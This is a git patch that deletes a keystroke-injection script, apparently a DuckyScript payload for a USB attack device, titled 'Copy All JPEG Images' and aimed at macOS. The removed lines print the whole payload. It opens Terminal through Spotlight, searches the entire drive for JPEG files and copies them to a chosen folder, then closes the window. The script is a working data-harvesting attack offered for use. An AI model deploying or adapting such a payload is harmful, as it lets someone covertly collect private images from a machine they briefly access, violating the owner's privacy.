From 0e6a2a89decf2064ff8ec5dd6c60a4695ecf0fe9 Mon Sep 17 00:00:00 2001 From: Narsty Date: Mon, 15 May 2023 23:08:06 -0500 Subject: [PATCH] Delete Copy All JPEG Images .txt --- Executions/Copy All JPEG Images .txt | 24 ------------------------ 1 file changed, 24 deletions(-) delete mode 100644 Executions/Copy All JPEG Images .txt diff --git a/Executions/Copy All JPEG Images .txt b/Executions/Copy All JPEG Images .txt deleted file mode 100644 index 899a707..0000000 --- a/Executions/Copy All JPEG Images .txt +++ /dev/null @@ -1,24 +0,0 @@ -REM This script opens the terminal. -REM It searches for all JPEG image files located on the entire hard drive. -REM It copies the found JPEG images to a folder named "Images" in the destination of your choice. - -REM you can adjust the Delay paramater on line 21 to capture more or less - -REM Author: Narsty -REM Title: Copy All JPEG Images -REM Target: MacOS -REM Version: 1.0 -REM Category: Execution - -DELAY 300 -GUI SPACE -DELAY 500 -STRING terminal -DELAY 1000 -ENTER -DELAY 1000 -STRING find / -type f -iname "*.jpeg" -exec cp {} ~/Insert Destination here /Images/ \; -DELAY 20000 -CTRL C -ENTER -GUI q